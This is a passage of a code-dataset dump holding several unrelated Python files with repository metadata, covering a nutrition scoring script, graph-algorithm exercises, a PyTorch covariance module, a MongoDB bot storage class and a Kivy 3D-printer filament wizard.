score = 0\n plus_points = a + b + c + d\n if plus_points >= 11 and e > -5:\n score = plus_points + e + f\n else:\n score = plus_points + e + f + g\n\n score_label = ''\n if score <= -1:\n score_label = 'A'\n elif score <= 2:\n score_label = 'B'\n elif score <= 10:\n score_label = 'C'\n elif score <= 18:\n score_label = 'D'\n else:\n score_label = 'E'\n\n print('RECIPE: ', r['title'], ': ', score, '-', score_label, ' (', a, ',', b, ',', c, ',', d, ',', e, ',', f, ',', g, ')')\n\n sql = \"UPDATE recipes SET nutri_score=%s, nutri_score_label=%s WHERE id=%s\"\n values = (score, score_label, r['id'])\n cursor.execute(sql, values)\n conn.commit()\n\nconn.close()\n","repo_name":"silvia-ivanova-github-rep/distant-reading-taste","sub_path":"DistantReadingTaste/Scripts/set_recipe_nutriscore.py","file_name":"set_recipe_nutriscore.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17129796827","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@author: Kazem Gheysari\r\n\r\n\"\"\"\r\n\r\nfrom fractions import Fraction\r\n\r\ndef a_iter():\r\n \"\"\"\r\n In this generator, we use the Miller's algorithm for finding the N-th value of the relation. \r\n The original recurrence relation in unstable but reverse relation in stable , or \r\n Using the same recurrence relation to go backwards, from high orders to low orders, is stable. \r\n\r\n Parameters\r\n ----------\r\n No input parameter\r\n\r\n Returns\r\n -------\r\n y : float\r\n The n-th value of the sequence\r\n \r\n Example\r\n -----\r\n y = round(list(islice(a_iter(), 100))[-1], 5)\r\n \r\n \"\"\" \r\n an_1 = Fraction(2)\r\n an = Fraction(-4)\r\n \r\n while(True): \r\n an_1, an = an, Fraction(111-(1130/an)+(3000/(an_1*an)))\r\n # print(float(an)) \r\n yield float(an) \r\n \r\n\r\n\r\n\r\nif __name__ == '__main__': \r\n from itertools import islice\r\n for n in [3, 4, 5, 6, 7, 8, 20, 30, 50, 100]:\r\n print(\"{:4d} ---> {}\".format(n, list(islice(a_iter(), n))[-1]))\r\n \r\n y = round(list(islice(a_iter(), 100))[-1], 5)\r\n\r\n print(y)\r\n \r\n ","repo_name":"PymatFlow/Muller-sequence","sub_path":"4.Generator/code_generator.py","file_name":"code_generator.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7501757062","text":"#!/usr/bin/env python\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndf = pd.read_table(\"/Users/cmdb/qbb2015/stringtie/SRR072893/t_data.ctab\")\nroi = df['FPKM'] >0\n\nplot=df[roi]['FPKM']\nlog=np.log(plot)\n\nplt.figure()\nplt.hist(log.values)\nplt.xlabel('log of FPKM')\nplt.ylabel('Frequency')\nplt.title('Frequency of FPKM')\nplt.savefig(\"fpkm.png\")\n\n\n\n","repo_name":"jkirshner/qbb2015-homework","sub_path":"day3/histogram.day3.py","file_name":"histogram.day3.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42045965029","text":"#!/usr/bin/env python\nimport RPi.GPIO as GPIO\nimport sys\nimport time\n\nclass Led:\n def __init__(self, output_pin:int):\n self._output_pin = output_pin\n self.is_on = False\n self._setup()\n\n def _setup(self):\n GPIO.setup(self._output_pin, GPIO.OUT, initial= GPIO.LOW)\n\n def start_blink(self, value):\n while True:\n self.turn_on()\n time.sleep(0.5)\n self.turn_off()\n time.sleep(0.5)\n\n def stop_blink(self):\n self.turn_off()\n\n def turn_on(self):\n 
GPIO.output(self._output_pin, GPIO.HIGH)\n\n def turn_off(self):\n GPIO.output(self._output_pin, GPIO.LOW)\n\n\nif __name__ == \"__main__\":\n try:\n GPIO.setmode(GPIO.BOARD)\n Led_obj = Led(11)\n Led_obj.start_blink()\n except KeyboardInterrupt:\n GPIO.cleanup()\n sys.exit()\n","repo_name":"omk42/Smart-Water-System","sub_path":"lib/Led.py","file_name":"Led.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10271445626","text":"# a, b, d = depth first traversal\n# a, b, c = breadth first traversal\n\n# depth first: stack\n# breadth first: queue\n\n\ngraph = {\n \"a\": [\"c\", \"b\"],\n \"b\": [\"d\"],\n \"c\": [\"e\"],\n \"d\": [\"f\"],\n \"e\": [],\n \"f\": [],\n}\n\n# depth first traversal: printing\n\n\ndef depthFirstPrinting(graph, source):\n # source is like the starting node\n stack = [source]\n while len(stack) > 0:\n current = stack.pop()\n print(current)\n for neighbour in graph[current]:\n stack.append(neighbour)\n # return stack # a, c, e, b, d, f <- this order depends on a's order of neighbours.\n\n\n# _________________________________________\n# UNCOMMENT FUNCTION CALL: DEPTH_FIRST_PRINT\n# depthFirstPrinting(graph, 'a')\n\n\n# ___________________ RECURSION _________________\ndef depthFirstPrintRecursion(graph, source):\n print(source)\n for neighbour in graph[source]:\n depthFirstPrintRecursion(graph, neighbour)\n\n\n# _________________________________________\n# UNCOMMENT FUNCTION CALL: DEPTH_FIRST_PRINT_RECURSION\n# depthFirstPrintRecursion(graph, 'a')\n\n\n# _____________ BREADTH FIRST PRINT _____________\n# BREADTH FIRST PRINT (only iterative) : queue\ndef breadthFirstPrint(graph, source):\n queue = [source]\n while len(queue) > 0:\n current = queue.pop(0)\n print(current)\n for neighbour in graph[current]:\n queue.append(neighbour)\n\n\n# _________________________________________\n# UNCOMMENT FUNCTION CALL: BREADTH_FIRST_PRINT\n# breadthFirstPrint(graph, 'a')\n\n\n# ____________________ HASPATH __________________\n# indication whether we can travel from source(src) to destination (dst) node. returning True or False\n\n# DEPTH FIRST HAS_PATH RECURSION\n\n\ndef haspathDepth(graph, src, dst):\n if src is dst:\n return True\n for neighbour in graph[src]:\n if haspathDepth(graph, neighbour, dst):\n return True\n return False\n\n\n# _________________________________________\n# UNCOMMENT FUNCTION CALL HAS_PATH_DEPTH\n# print(haspathDepth(graph, 'a', 'f'))\n\n\n# # BREADTH FIRST HAS_PATH\n\n\n# breadthfirstHasPath\ndef breadth_has_path(graph, src, dst):\n queue = [src]\n while len(queue) > 0:\n current = queue.pop(0)\n if current == dst:\n return True\n for neighbour in graph[current]:\n queue.append(neighbour)\n return False\n\n\n# _________________________________________\n# UNCOMMENT FUNCTION CALL HAS_PATH_BREADTH\n# print(breadth_has_path(graph, 'a', 'f'))\n\n\n# ____________________ UNDIRECTED_PATH_DEPTH __________________\n# looking for path between src and destination: undirected\n\n\ndef undirected_path_depth(edges, nodeA, nodeB):\n graph = build_graph(edges)\n return hasPath(graph, nodeA, nodeB, set())\n\n\ndef hasPath(graph, src, dst, visited):\n # if src is destination return True\n if src == dst:\n return True\n # if we have visited the node before we can return False\n if src in visited:\n return False\n visited.add(src)\n for neighbour in graph[src]:\n if hasPath(graph, neighbour, dst, visited) is True:\n return True\n return False\n\n\n# below is an edge list. 
every pair in this list represents a connection between 2 nodes.\nedges = [\n [\"i\", \"j\"],\n [\"k\", \"i\"],\n [\"m\", \"k\"],\n [\"k\", \"l\"],\n [\"o\", \"n\"],\n]\n\n\ndef build_graph(edges):\n graph = {}\n for edge in edges:\n a, b = edge\n if a not in graph:\n graph[a] = []\n if b not in graph:\n graph[b] = []\n graph[a].append(b)\n graph[b].append(a)\n return graph\n\n\n# build_graph converts the edges list into the adjacency list below. adjacency lists are like the default comfortable format.\n# best to convert the edge list into an adjacency list.\n# adjacency list:\n# graph = {\n# i: [j, k],\n# j: [i],\n# k: [i, m, l],\n# m: [k],\n# l: [k],\n# o: [n],\n# n: [o]\n# }\n\n# _________________________________________\n# UNCOMMENT FUNCTION CALL UNDIRECTED_PATH_DEPTH\n# print(undirected_path_depth(edges, 'i', 'o'))\n\n\n# ____________________ CONNECTED_COMPONENTS_COUNT __________________\n# the result for the undirected graph below: 3 CONNECTED COMPONENTS: 1-2 ||| 4-5-6-7-8 ||| 3\ngraph_connected_components = {\n 3: [],\n 4: [6],\n 6: [4, 5, 7, 8],\n 8: [6],\n 7: [6],\n 5: [6],\n 1: [2],\n 2: [1],\n}\n\n# combine graph traversal and iterative code.\n\n\ndef connected_components(graph):\n visited = set()\n count = 0\n for node in graph:\n # uncomment below to see the set visited.\n # print(visited)\n if explore(graph, node, visited) is True:\n count += 1\n return count\n\n\ndef explore(graph, current, visited):\n if current in visited:\n return False\n visited.add(current)\n for neighbour in graph[current]:\n explore(graph, neighbour, visited)\n return True\n\n\n# _________________________________________\n# UNCOMMENT FUNCTION CALL CONNECTED_COMPONENTS_COUNT\n# print(connected_components(graph_connected_components))\n\n\n# timestamp 1:15:03\n# ____________________ LARGEST_COMPONENT __________________\n# 2 components: 1-0-5-8(size4) ||| 4-2-3(size3)\nad_list_largest_component = {\n 0: [8, 1, 5],\n 1: [0],\n 5: [0, 8],\n 8: [0, 5],\n 2: [3, 4],\n 3: [2, 4],\n 4: [3, 2],\n}\n\n\ndef largest_component(graph):\n visited = set()\n largest = 0\n for node in graph:\n size = explore_size(graph, node, visited)\n if size > largest:\n largest = size\n return largest\n\n\ndef explore_size(graph, node, visited):\n if node in visited:\n return 0\n visited.add(node)\n size = 1\n for neighbour in graph[node]:\n size += explore_size(graph, neighbour, visited)\n return size\n\n\n# _________________________________________\n# UNCOMMENT FUNCTION CALL GRAPH_LARGEST_COMPONENT\n# print(largest_component(ad_list_largest_component))\n\n\n# timestamp 1:24:06 SHORTEST PATH\n# taking in edgelist\n\nshortest_path_edgelist = [\n [\"w\", \"x\"],\n [\"x\", \"y\"],\n [\"z\", \"y\"],\n [\"z\", \"v\"],\n [\"w\", \"v\"],\n [\"g\", \"h\"],\n]\n\n\ndef build_shortest_path_ad_list(edgelist):\n graph = {}\n for item in edgelist:\n a, b = item\n if a not in graph:\n graph[a] = []\n if b not in graph:\n graph[b] = []\n graph[a].append(b)\n graph[b].append(a)\n return graph\n\n\nshortest_path_ad_list = build_shortest_path_ad_list(shortest_path_edgelist)\n\n# print(shortest_path_ad_list)\n\n\n# if there is a path, nodeA == nodeB, return distance.\ndef shortest_path(edges, nodeA, nodeB):\n graph = build_shortest_path_ad_list(edges)\n visited = set([nodeA])\n queue = [[nodeA, 0]]\n while len(queue) > 0:\n node, distance = queue.pop(0)\n if node == nodeB:\n return distance\n for neighbour in graph[node]:\n if neighbour not in visited:\n visited.add(neighbour)\n queue.append((neighbour, distance + 1))\n return f\"No path found 
between {nodeA} and {nodeB}.\"\n\n\n# _________________________________________\n# UNCOMMENT FUNCTION CALL SHORTEST_PATH\n# print(shortest_path(shortest_path_edgelist, \"w\", \"z\")) # 2\n# print(shortest_path(shortest_path_edgelist, \"x\", \"h\")) # no path found\n\n\nisland_grid = [\n [\"W\", \"L\", \"W\", \"W\", \"W\"],\n [\"W\", \"L\", \"W\", \"W\", \"W\"],\n [\"W\", \"W\", \"W\", \"L\", \"W\"],\n [\"W\", \"W\", \"L\", \"L\", \"W\"],\n [\"L\", \"W\", \"W\", \"L\", \"L\"],\n [\"L\", \"L\", \"W\", \"W\", \"W\"],\n]\n\n\ndef island_count(grid):\n visited = set()\n count = 0\n for r in range(len(grid)):\n for c in range(len(grid[0])):\n if explore(grid, r, c, visited):\n count += 1\n return count\n\n\ndef explore(grid, r, c, visited):\n row_inbounds = 0 <= r < len(grid)\n col_inbounds = 0 <= c < len(grid[0])\n if not row_inbounds or not col_inbounds:\n return False\n if grid[r][c] == \"W\":\n return False\n\n pos = (r, c)\n if pos in visited:\n return False\n visited.add(pos)\n\n explore(grid, r - 1, c, visited)\n explore(grid, r + 1, c, visited)\n explore(grid, r, c - 1, visited)\n explore(grid, r, c + 1, visited)\n\n return True\n\n\n# _________________________________________\n# UNCOMMENT FUNCTION CALL: ISLAND COUNT\n# print(island_count(island_grid))\n\n\nminimum_island_grid = [\n [\"L\", \"W\", \"L\", \"L\", \"W\"],\n [\"L\", \"W\", \"W\", \"L\", \"L\"],\n [\"W\", \"W\", \"W\", \"L\", \"W\"],\n [\"W\", \"W\", \"W\", \"W\", \"W\"],\n [\"W\", \"W\", \"L\", \"L\", \"L\"],\n]\n\n\ndef minimum_island(grid):\n all_islands = []\n visited = set()\n for r in range(len(grid)):\n for c in range(len(grid[0])):\n x = explore(grid, r, c, visited)\n if x:\n all_islands.append(x)\n return min(all_islands)\n\n\ndef explore(grid, r, c, visited):\n row_inbounds = 0 <= r < len(grid)\n col_inbounds = 0 <= c < len(grid[0])\n if not row_inbounds or not col_inbounds:\n return 0\n if grid[r][c] == \"W\":\n return 0\n\n pos = (r, c)\n if pos in visited:\n return 0\n visited.add(pos)\n\n size = 1\n size += explore(grid, r - 1, c, visited)\n size += explore(grid, r + 1, c, visited)\n size += explore(grid, r, c + 1, visited)\n size += explore(grid, r, c - 1, visited)\n\n return size\n\n\n# _________________________________________\n# UNCOMMENT FUNCTION CALL: MINIMUM ISLAND\nprint(minimum_island(minimum_island_grid))\n","repo_name":"oliverchong97/Technical_DS","sub_path":"Technical_Interview_DS_Algorithms/Interview_Algorithms=Graphs.py","file_name":"Interview_Algorithms=Graphs.py","file_ext":"py","file_size_in_byte":9337,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"29234409547","text":"import pytest\n\nfrom maps_adv.billing_proxy.lib.data_manager.exceptions import ClientsDoNotExist\nfrom maps_adv.billing_proxy.lib.domain.exceptions import ClientDoesNotExist\n\npytestmark = [pytest.mark.asyncio, pytest.mark.mock_dm]\n\n\nasync def test_calls_dm(clients_domain, clients_dm):\n\n await clients_domain.set_account_manager_for_client(\n client_id=11, account_manager_id=100500\n )\n\n clients_dm.set_account_manager_for_client.assert_called_with(11, 100500)\n\n\nasync def test_raises_for_nonexistent_agency(factory, clients_dm, clients_domain):\n inexistent_id = await factory.get_inexistent_client_id()\n\n clients_dm.set_account_manager_for_client.coro.side_effect = ClientsDoNotExist(\n client_ids=[inexistent_id]\n )\n\n with pytest.raises(ClientDoesNotExist) as exc:\n await clients_domain.set_account_manager_for_client(\n client_id=inexistent_id, 
account_manager_id=100500\n )\n\n assert exc.value.client_id == inexistent_id\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"maps/tests/domain/clients/test_set_account_manager.py","file_name":"test_set_account_manager.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6865294832","text":"import numpy as np\nfrom pandas import Series\nfrom .ptre import Ptre\n\n\ndef is_crystal() -> bool:\n pass\n\n\ndef check_vle_density(series: Series) -> (bool, bool, [float]):\n '''\n Check in a density series is interface\n\n :param series: density series. The index is the z axis\n :return: is interface: bool\n center is gas phase: bool\n location of changing nodes [float]\n '''\n interval = series.index[1] - series.index[0]\n\n result, peaks = Ptre.test_data(series, interval) # the peaks starts from 0, not original index\n peaks.sort(key=lambda x: x[0])\n\n if result != Ptre._PATTERN_A:\n return False, None, None\n\n nodes = [p[0] + series.index[0] for p in peaks]\n return True, peaks[0][1] > 0, nodes\n\n\ndef N_vaporize_condense(phases) -> (int, int):\n '''\n Check the number of vaporize and condensation\n\n :param list: ['l', 'i', 'g'], liquid, interface, gas\n :return: (N_vapor, N_condense)\n '''\n N_vapor = N_condense = 0\n phases = [i for i in phases if i != 'i']\n while len(phases) > 1:\n if phases[0] == 'l' and phases[1] == 'g':\n N_vapor += 1\n elif phases[0] == 'g' and phases[1] == 'l':\n N_condense += 1\n phases.pop(0)\n\n return N_vapor, N_condense\n\n\ndef check_interface(series: Series, debug=False) -> (bool, list):\n interval = series.index[1] - series.index[0]\n\n result, peaks = Ptre.test_data(series, interval, debug=debug)\n\n if debug:\n try:\n import pylab\n except:\n print('matplotlib not found, cannot debug')\n else:\n t = np.array(series.index) - series.index[0]\n pylab.plot(t, series)\n if result in [Ptre._PATTERN_A, Ptre._PATTERN_D]:\n pylab.vlines([p[0] for p in peaks], 0, 1, colors='red')\n pylab.show()\n\n for i in range(0, len(peaks)):\n if peaks[i][1] < 0:\n state = 'INCREASING'\n else:\n state = 'DECREASING'\n print(state, peaks[i][0])\n\n if result == Ptre._PATTERN_A:\n return True, peaks\n else:\n return False, peaks\n\n\ndef angular_momentum(com, mass_list, corr_list, vel_list, vel_com):\n ### TODO Not sure whether it is correct\n Lx = Ly = Lz = 0\n for i, corr in enumerate(corr_list):\n dx = corr[0] - com[0]\n dy = corr[1] - com[1]\n dz = corr[2] - com[2]\n vx = vel_list[i][0] - vel_com[0]\n vy = vel_list[i][1] - vel_com[1]\n vz = vel_list[i][2] - vel_com[2]\n mass = mass_list[i]\n Lx += mass * (dy * vz - dz * vy)\n Ly += mass * (dz * vx - dx * vz)\n Lz += mass * (dx * vy - dy * vx)\n return Lx, Ly, Lz\n\n\ndef velocity_com(mass_list, vel_list):\n Vx = Vy = Vz = 0\n for i, vel in enumerate(vel_list):\n vx = vel_list[i][0]\n vy = vel_list[i][1]\n vz = vel_list[i][2]\n mass = mass_list[i]\n\n Vx += mass * vx\n Vy += mass * vy\n Vz += mass * vz\n total_mass = sum(mass_list)\n Vx /= total_mass\n Vy /= total_mass\n Vz /= total_mass\n\n return Vx, Vy, Vz\n","repo_name":"sungroup-sjtu/AIMS_Tools","sub_path":"mstools/analyzer/structure.py","file_name":"structure.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4009469940","text":"# -*- coding: utf-8 -*-\n# @Auther : Mingsong Li (lms-07)\n# @Time : 2023-Apr\n# @Address : Time Lab @ SDU\n# @FileName : 
DCR.py\n# @Project : AMS-M2ESL (HSIC), IEEE TGRS\n\nimport torch\nimport torch.nn as nn\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n'''\nfor the two implementations of distance covariance represntation (DCR),\nthe implementation1 (_DCR_1) is based on DeepBDC, i.e.,\nJoint Distribution Matters: Deep Brownian Distance Covariance for Few-Shot Classification, CVPR 2022 \nhttps://github.com/Fei-Long121/DeepBDC/blob/main/methods/bdc_module.py,\nand _DCR_2 is our original implementation based on Brownian distance covariance, https://doi.org/10.1214/09-AOAS312.\nthe two implementations achieve similar performance in our AMS-M2ESL framework, we randomly chose _DCR_1 as the final version.\n'''\n\n\nclass Spectral_corr_mining(nn.Module):\n def __init__(self, in_channels):\n super(Spectral_corr_mining, self).__init__()\n self.temperature = nn.Parameter(\n torch.log((3.2 / (in_channels * in_channels)) * torch.ones(1, 1, device=device)), requires_grad=True)\n\n def forward(self, x):\n x_corr = self._DCR_1(x, self.temperature)\n # x_corr=self._DCR_2(x)\n\n # for abla of DCR\n # x_corr=self._CR(x)\n\n return x_corr\n\n def _DCR_1(self, x, t):\n len_x = len(x.size())\n\n if len_x == 3:\n # spatial\n batchSize, c, h_w = x.size()\n x = x.permute(0, 2, 1)\n c = h_w\n elif len_x == 4:\n # spectral channel\n batchSize, c, h, w = x.size()\n h_w = h * w\n x = x.reshape(batchSize, c, h_w)\n\n I = torch.eye(c, c, device=x.device).view(1, c, c).repeat(batchSize, 1, 1).type(x.dtype)\n I_M = torch.ones(batchSize, c, c, device=x.device).type(x.dtype)\n x_pow2 = x.bmm(x.transpose(1, 2))\n dcov = I_M.bmm(x_pow2 * I) + (x_pow2 * I).bmm(I_M) - 2 * x_pow2\n\n dcov = torch.clamp(dcov, min=0.0)\n dcov = torch.exp(t) * dcov\n dcov = torch.sqrt(dcov + 1e-5)\n\n out = dcov - 1. / c * dcov.bmm(I_M) - 1. / c * I_M.bmm(dcov) + 1. 
/ (c * c) * I_M.bmm(dcov).bmm(I_M)\n\n return out * (-1)\n\n def _DCR_2(self, x):\n batch_size, c, h, w = x.size()\n\n x = x.view(batch_size, -1, h * w).permute(0, 2, 1)\n\n x = x.permute(0, 2, 1)\n x1, x2 = x[:, :, None], x[:, None]\n x3 = x1 - x2\n band_l2_mat = torch.norm(x3, dim=3, p=2)\n\n bem_mean_row, becm_mean_col = torch.mean(band_l2_mat, dim=1, keepdim=True), torch.mean(band_l2_mat, dim=2,\n keepdim=True)\n bem_mean_row_expand, becm_mean_col_expand = bem_mean_row.expand(band_l2_mat.shape), becm_mean_col.expand(\n band_l2_mat.shape)\n bem_mean_plus_row_col = bem_mean_row_expand + becm_mean_col_expand\n bem_mean_all = torch.mean(bem_mean_row, dim=2)\n becm = band_l2_mat - bem_mean_plus_row_col + torch.unsqueeze(bem_mean_all, dim=-1)\n\n return becm * (-1)\n\n def _CR(self, x):\n batch_size, c, h, w = x.size()\n\n x = x.view(batch_size, -1, h * w).permute(0, 2, 1)\n mean_pixel = torch.mean(x, dim=1, keepdim=True)\n mean_pixel_expand = mean_pixel.expand(x.shape)\n\n x_cr = x - mean_pixel_expand\n CR = torch.bmm(x_cr.permute(0, 2, 1), x_cr)\n CR = torch.div(CR, h * w - 1)\n\n return CR\n","repo_name":"Candy-CY/Hyperspectral-Image-Classification-Models","sub_path":"AMS-M2ESL/model/module/DCR.py","file_name":"DCR.py","file_ext":"py","file_size_in_byte":3488,"program_lang":"python","lang":"en","doc_type":"code","stars":237,"dataset":"github-code","pt":"3"} +{"seq_id":"35866160693","text":"from jsonpickle.pickler import Pickler\r\nfrom jsonpickle.unpickler import Unpickler\r\nfrom typing import Dict, List\r\nfrom botbuilder.core import Storage\r\nimport motor.motor_asyncio\r\n\r\n\r\nclass MongodbStorage(Storage):\r\n \"\"\"The class for MongoDB middleware for the Azure Bot Framework.\"\"\"\r\n\r\n ID_TAG = 'real_id'\r\n DOCUMENT_TAG = 'document'\r\n\r\n def __init__(self, connection_string, db, collection, **kwargs):\r\n \"\"\"Create the storage object.\r\n\r\n :param connection_string: mongoDB connection URI\r\n :param db: db name\r\n :param collection: collection name\r\n :param kwargs: parameters to pass to MongoClient as keyword arguments\r\n \"\"\"\r\n super(MongodbStorage, self).__init__()\r\n\r\n self.connection_string = connection_string\r\n self.db_name = db\r\n self.collection_name = collection\r\n\r\n self.mongodb_client = motor.motor_asyncio.AsyncIOMotorClient(self.connection_string, **kwargs)\r\n self.db = self.mongodb_client[self.db_name]\r\n\r\n async def write(self, changes: Dict[str, object]):\r\n \"\"\"Save storeitems to storage.\r\n\r\n :param changes:\r\n :return:\r\n \"\"\"\r\n if changes is None:\r\n raise Exception(\"Changes are required when writing\")\r\n if not changes:\r\n return\r\n try:\r\n # get the collection to save changes in\r\n collection = self.__collection\r\n\r\n for (key, change) in changes.items():\r\n # create a dictionary from the change object\r\n doc = self.__create_dict(change)\r\n\r\n # save each change in db collection\r\n await collection.update_one({MongodbStorage.ID_TAG: key},\r\n {'$set': {MongodbStorage.DOCUMENT_TAG: doc}},\r\n upsert=True)\r\n except Exception as error:\r\n raise error\r\n\r\n async def read(self, keys: List[str]):\r\n \"\"\"Read storeitems from storage.\r\n\r\n :param keys:\r\n :return dict:\r\n \"\"\"\r\n data = {}\r\n if not keys:\r\n return data\r\n try:\r\n # get the collection to read storeitems from\r\n collection = self.__collection\r\n\r\n # get the data for given keys from db collection\r\n data_from_db = collection.find({MongodbStorage.ID_TAG: {'$in': keys}})\r\n\r\n async for item in data_from_db:\r\n # 
create a storeitem from each db and save it in the result dictionary\r\n data[item[MongodbStorage.ID_TAG]] = self.__create_object(item)\r\n except TypeError as error:\r\n raise error\r\n\r\n return data\r\n\r\n async def delete(self, keys: List[str]):\r\n \"\"\"Remove storeitems from storage.\r\n\r\n :param keys:\r\n :return:\r\n \"\"\"\r\n try:\r\n # get the collection to delete storeitems from\r\n collection = self.__collection\r\n\r\n # delete all storeitems for given keys\r\n await collection.delete_many({MongodbStorage.ID_TAG: {'$in': keys}})\r\n except TypeError as error:\r\n raise error\r\n\r\n @property\r\n def __collection(self) -> motor.motor_asyncio.AsyncIOMotorCollection:\r\n \"\"\"Return db collection where storeitems are stored.\r\n\r\n :param:\r\n :return motor.motor_asyncio.AsyncIOMotorCollection:\r\n \"\"\"\r\n return self.db[self.collection_name]\r\n\r\n @staticmethod\r\n def __create_object(result) -> object:\r\n \"\"\"Create an object from a result out of MongoDb.\r\n\r\n :param result:\r\n :return object:\r\n \"\"\"\r\n # get the document item from the result and turn into a dict\r\n doc = result.get(MongodbStorage.DOCUMENT_TAG)\r\n\r\n # create and return the object\r\n result_obj = Unpickler().restore(doc)\r\n\r\n return result_obj\r\n\r\n @staticmethod\r\n def __create_dict(store_item: object) -> Dict:\r\n \"\"\"Return the dict of an object.\r\n This eliminates non_magic attributes and the e_tag.\r\n\r\n :param store_item:\r\n :return dict:\r\n \"\"\"\r\n # read the content\r\n json_dict = Pickler().flatten(store_item)\r\n if \"e_tag\" in json_dict:\r\n del json_dict[\"e_tag\"]\r\n\r\n return json_dict\r\n","repo_name":"aramayyes/Dram-Chatbot","sub_path":"src/storage/mongodb_storage.py","file_name":"mongodb_storage.py","file_ext":"py","file_size_in_byte":4306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19823067949","text":"# -*- coding: utf-8 -*-\nfrom kivy.uix.button import Button\nfrom kivy.properties import StringProperty, NumericProperty\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.label import Label\nfrom kivy.uix.widget import Widget\nfrom kivy.uix.togglebutton import ToggleButton\nfrom .. 
import roboprinter\nfrom functools import partial\nfrom kivy.logger import Logger\nfrom kivy.clock import Clock\nfrom pconsole import pconsole\nimport thread\nfrom Filament_Wizard import Filament_Wizard_Finish, Filament_Wizard_1_5, Filament_Wizard_2_5, Filament_Wizard_3_5, Filament_Wizard_4_5, Filament_Wizard_5_5\nfrom printer_jog import printer_jog\nfrom Preheat_Wizard import Preheat_Overseer\n\nclass FilamentWizard(Widget):\n \"\"\" \"\"\"\n temp = NumericProperty(0.0)\n layout2 = None\n extrude_event = None\n def __init__(self, loader_changer, robosm, name, **kwargs):\n super(FilamentWizard, self).__init__(**kwargs)\n # first screen defined in .kv file\n self.sm = robosm\n self.name = name #name of initial screen\n self.load_or_change = loader_changer\n #check if the printer is printing\n current_data = roboprinter.printer_instance._printer.get_current_data()\n self.is_printing = current_data['state']['flags']['printing']\n self.is_paused = current_data['state']['flags']['paused']\n self.tmp_event = None\n self.s_event = None\n self.E_Position = None\n\n if self.is_printing or self.is_paused:\n\n #get the E Position\n pos = pconsole.get_position()\n while not pos:\n pos = pconsole.get_position()\n\n self.E_Position = pos[3]\n\n self.first_screen(**kwargs)\n self.poll_temp() #populates self.temp\n\n def first_screen(self, **kwargs):\n \"\"\"\n First Screen:\n displays Start button that will open second_screen\n \"\"\"\n \n if self.is_printing or self.is_paused:\n layout = Filament_Wizard_1_5(self.second_screen)\n else:\n layout = Filament_Wizard_1_5(self.choose_material)\n \n self.sm._generate_backbutton_screen(name=self.name, title=kwargs['title'], back_destination=kwargs['back_destination'], content=layout)\n\n def choose_material(self, *args):\n \n Preheat_Overseer(end_point=self.collect_heat_settings,\n name='preheat_wizard',\n title=roboprinter.lang.pack['Utilities']['Preheat'],\n back_destination=self.name)\n\n def collect_heat_settings(self, extruder, bed):\n self.print_temperature = extruder\n self.print_bed_temperature = bed\n self.second_screen()\n\n def second_screen(self, *args):\n \"\"\"\n the Heating Screen:\n Sets the temperature of the extruder to 230\n Display heating status to user\n Open third screen when temperature hits 230\n \"\"\"\n #display heating status to user\n\n #end the event before starting it again\n if self.extrude_event != None:\n self.end_extrude_event()\n\n\n if self.load_or_change == 'CHANGE':\n _title = roboprinter.lang.pack['Filament_Wizard']['Title_15']\n else:\n _title = roboprinter.lang.pack['Filament_Wizard']['Title_14']\n\n # Heat up extruder\n if not self.is_printing and not self.is_paused:\n self.layout2 = Filament_Wizard_2_5(self.print_temperature)\n back_destination = 'preheat_wizard'\n \n this_screen = self.sm._generate_backbutton_screen(name=self.name+'[1]', title=_title, back_destination=back_destination, content=self.layout2)\n #back_button will also stop the scheduled events: poll_temp and switch_to_third_screen\n this_screen.ids.back_button.bind(on_press=self.cancel_second_screen_events)\n\n roboprinter.printer_instance._printer.set_temperature('tool0', self.print_temperature)\n self.tmp_event = Clock.schedule_interval(self.poll_temp, .5) #stored so we can stop them later\n self.s_event = Clock.schedule_interval(self.switch_to_third_screen, .75) #stored so we can stop them later\n else:\n if self.load_or_change == 'CHANGE':\n self.third_screen()\n \n elif self.load_or_change == 'LOAD':\n self.fourth_screen()\n \n ###Second screen 
helper functions ###\n def cancel_second_screen_events(self, *args):\n if self.tmp_event != None and self.s_event != None:\n self.tmp_event.cancel()\n self.s_event.cancel()\n\n def update_temp_label(self, obj, *args):\n # updates the temperature for the user's view\n obj.text = str(self.temp) + roboprinter.lang.pack['Filament_Wizard']['Celsius_Alone']\n\n def poll_temp(self, *args):\n # updates the temperature\n r = roboprinter.printer_instance._printer.get_current_temperatures()\n self.temp = r['tool0']['actual']\n if self.layout2 != None:\n self.layout2.update_temp(self.temp)\n\n def switch_to_third_screen(self, *args):\n # switches to third screen when temperature is set\n if self.temp >= self.print_temperature:\n if self.load_or_change == 'CHANGE':\n self.third_screen()\n # clock event no longer needed\n self.cancel_second_screen_events()\n elif self.load_or_change == 'LOAD':\n self.fourth_screen()\n # clock event no longer needed\n self.cancel_second_screen_events()\n #####################################\n\n def third_screen(self):\n \"\"\"\n Pull filament Screen:\n Display instructions to user -- Pull out filament\n Display button that will open fourth screen\n \"\"\"\n # roboprinter.printer_instance._printer.jog('e', -130.00)\n c = Filament_Wizard_3_5(self.fourth_screen)\n back_destination = roboprinter.robo_screen()\n this_screen = self.sm._generate_backbutton_screen(name=self.name+'[2]', 